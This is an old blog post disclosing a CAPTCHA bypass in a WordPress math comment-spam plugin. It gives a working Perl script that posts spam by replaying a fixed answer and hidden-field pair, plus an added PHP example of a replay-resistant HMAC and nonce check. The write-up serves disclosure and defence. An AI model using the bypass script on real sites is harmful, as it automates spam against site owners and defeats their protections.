Friday, July 07, 2006

Math Comment Spam Protection Plugin - by-pass

WordPress plugin against spam (by Michael Woehrer)
-> http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/

Easy to bypass: you only have to send $mathuseranswer and $mathresult with any valid values.


#!/usr/bin/perl -w

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use strict;

# mathuseranswer: 9+5 = 14
# mathresult: 59568733


my $url = 'http://localhost/wordpress/wp-comments-post.php';

my $req = POST $url,
[
    comment_post_ID => '3',
    author => 'spam',
    email => 'more@spam.com',   # single quotes: no backslash needed before @
    comment => 'spammm2',
    mathuseranswer => '14',
    mathresult => '59568733'
];

print "HTTP-FullRequest-Header: \n";
print $req->headers->as_string() , "\n";

print "HTTP-FullRequest-Header-Content: \n";
print $req->content() ,"\n";


my $ua = LWP::UserAgent->new();

my $response = $ua->request($req);

if ( $response->is_error() ) {
    print "Error-Code : ", $response->code() , "\n";
    print "Fehlermeldung: ", $response->message() , "\n";
}
else {
    print $response->content() , "\n";
}
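
For the defending side, an added example (not from the original post and not the plugin's own code) of why a fixed answer/hidden-field pair stays valid, next to a check that rejects the replay. The weak model is an assumption inferred from the script above; every function name, the demo secret and the in-memory nonce store are hypothetical.

```php
<?php
// Added illustration; all function names are hypothetical, not the plugin's.
// Assumed weak model: the hidden field is a keyless function of the answer
// alone, so a pair captured once validates on every later request.
function weak_token(int $answer): string {
    return (string) crc32((string) $answer); // stand-in for any keyless encoding
}
function weak_check(string $userAnswer, string $token): bool {
    return ctype_digit($userAnswer) && weak_token((int) $userAnswer) === $token;
}

// Hardened: token = expiry.nonce.HMAC(secret, answer|postId|expiry|nonce)
function issue_token(string $secret, int $answer, int $postId, int $ttl = 600): string {
    $expiry = time() + $ttl;
    $nonce  = bin2hex(random_bytes(8));
    $mac    = hash_hmac('sha256', "$answer|$postId|$expiry|$nonce", $secret);
    return "$expiry.$nonce.$mac";
}

// $usedNonces stands in for a server-side store that survives between requests.
function check_token(string $secret, string $userAnswer, int $postId,
                     string $token, array &$usedNonces): bool {
    $parts = explode('.', $token);
    if (count($parts) !== 3 || !ctype_digit($userAnswer)) {
        return false;                       // malformed token or non-numeric answer
    }
    [$expiry, $nonce, $mac] = $parts;
    if (!ctype_digit($expiry) || (int) $expiry < time()) {
        return false;                       // expired
    }
    $expected = hash_hmac('sha256', (int) $userAnswer . "|$postId|$expiry|$nonce", $secret);
    if (!hash_equals($expected, $mac)) {
        return false;                       // wrong answer, other post, or forged field
    }
    if (isset($usedNonces[$nonce])) {
        return false;                       // same token submitted again
    }
    $usedNonces[$nonce] = true;
    return true;
}

// Constructed demo values.
$secret = 'constructed-demo-secret';
$used   = [];
$token  = issue_token($secret, 14, 3);
var_dump(weak_check('14', weak_token(14)));              // weak: replayable pair
var_dump(check_token($secret, '14', 3, $token, $used));  // first submission
var_dump(check_token($secret, '14', 3, $token, $used));  // replay of same token
var_dump(check_token($secret, '14', 4, $token, $used));  // token moved to another post
```

Binding the token to a secret, a post, an expiry and a single-use nonce stops the fixed-pair replay. A client that reads and solves each challenge still passes, so this only limits each solved challenge to one comment.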